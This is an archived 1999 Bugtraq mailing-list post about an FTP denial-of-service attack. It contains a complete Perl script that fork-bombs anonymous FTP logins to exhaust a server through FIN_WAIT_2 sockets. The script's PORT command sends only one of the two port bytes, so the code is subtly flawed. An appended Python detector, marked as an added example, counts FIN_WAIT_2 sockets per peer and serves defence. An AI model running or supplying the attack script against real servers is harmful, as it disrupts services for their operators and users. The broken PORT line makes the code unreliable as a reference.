Bugtraq mailing list archives
Re: FTP denial of service attack
From: avalon () COOMBS ANU EDU AU (Darren Reed)
Date: Wed, 8 Dec 1999 18:01:53 +1100
In some mail from Theo de Raadt, sie said: [...]
The OpenBSD ftpd has never permitted more than 1 connection at a time in PASV mode, thus this particular denial of service attack does not work.
Excellent.
I caused myself some difficulties by accidentally starting up 400 perl instances, though..
There's no helping pilot error ;)
Below is an attached perl script which attacks based on the fin-wait-2 `problem'.
Darren
#!/usr/bin/perl
$DOS_HOST="localhost";
use IO::Socket;
$pid = $$;
$num = 0;
while (1) {
    while (fork) {
        $sock = IO::Socket::INET->new(
            Proto => "tcp",
            PeerAddr => $DOS_HOST,
            PeerPort => "ftp(21)",
        );
        last if (!$sock);
        $me = getsockname($sock);
        ($mport, $mip) = unpack_sockaddr_in($me);
        if (!$sock) {
            print "connect failed!\n";
            waitpid -1,0;
        }
        $sock->autoflush(1);
        while (<$sock>) {
            print;
            print $sock "USER anonymous\r\n" if (/^220 .*/);
            print $sock "PASS root@\r\n" if (/^331 .*/);
            if (/^150 .*/) {
                $conn[$num++] = $x->accept();
            } elsif (/^200 .*/) {
                print $sock "NLST\r\n";
            } elsif (/^230 .*/ || /^226 .*/) {
                $x = IO::Socket::INET->new(
                    Proto => "tcp",
                    LocalAddr => inet_ntoa($mip),
                    Listen => 1,
                );
                last if (!$x);
                $lsock[$num] = $x;
                $local = getsockname($x);
                ($lport, $lip) = unpack_sockaddr_in($local);
                ($sip = inet_ntoa($mip)) =~ s/\./,/g;
                $lp[0] = $lport >> 8;
                $lp[1] = $lport & 0xff;
                print $sock "PORT $sip,$lp[1]\r\n";
            }
            last if (/^530 .*/);
        }
        waitpid -1,0;
    }
    sleep(5);
}
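Added example, not part of Darren Reed's post: a server-side check for the symptom the script relies on, counting FTP data sockets sitting in FIN_WAIT_2 per remote peer from netstat output. It assumes active-mode data connections leave the server from port 20; the netstat sample, the addresses and the threshold of 3 are constructed for illustration.

```python
import re
from collections import Counter

# Constructed `netstat -ant` sample; the last row uses the BSD "ip.port" layout.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 192.0.2.10:21           198.51.100.7:40112      ESTABLISHED
tcp        0      0 192.0.2.10:20           198.51.100.7:40113      FIN_WAIT2
tcp        0      0 192.0.2.10:20           198.51.100.7:40114      FIN_WAIT2
tcp        0      0 192.0.2.10:20           198.51.100.7:40115      FIN_WAIT2
tcp        0      0 192.0.2.10:20           203.0.113.5:51000       FIN_WAIT2
tcp        0      0 192.0.2.10:20           203.0.113.5:51001       TIME_WAIT
tcp4       0      0 192.0.2.10.20           198.51.100.7.40116      FIN_WAIT_2
"""

# Matches "ip:port" (Linux) and "ip.port" (BSD); the port may be "*".
ADDR = re.compile(r"^(.*)[:.](\d+|\*)$")


def split_addr(field):
    """Split a netstat address column into (host, port) strings."""
    m = ADDR.match(field)
    return (m.group(1), m.group(2)) if m else (field, "")


def fin_wait2_by_peer(netstat_text, data_port="20"):
    """Count FIN_WAIT_2 sockets on the FTP data port, keyed by remote host."""
    counts = Counter()
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) < 6 or not f[0].startswith("tcp"):
            continue  # header, blank or non-TCP row
        state = f[5].replace("_", "").upper()  # FIN_WAIT_2 and FIN_WAIT2 alike
        _, lport = split_addr(f[3])
        peer, _ = split_addr(f[4])
        if state == "FINWAIT2" and lport == data_port:
            counts[peer] += 1
    return counts


def suspects(netstat_text, threshold=3):
    """Peers holding at least `threshold` data sockets in FIN_WAIT_2."""
    counts = fin_wait2_by_peer(netstat_text)
    return sorted(p for p, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    print(fin_wait2_by_peer(SAMPLE_NETSTAT), suspects(SAMPLE_NETSTAT))
```

A count that keeps growing for one peer across successive samples is the signal; a single FIN_WAIT_2 socket is normal during connection teardown.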
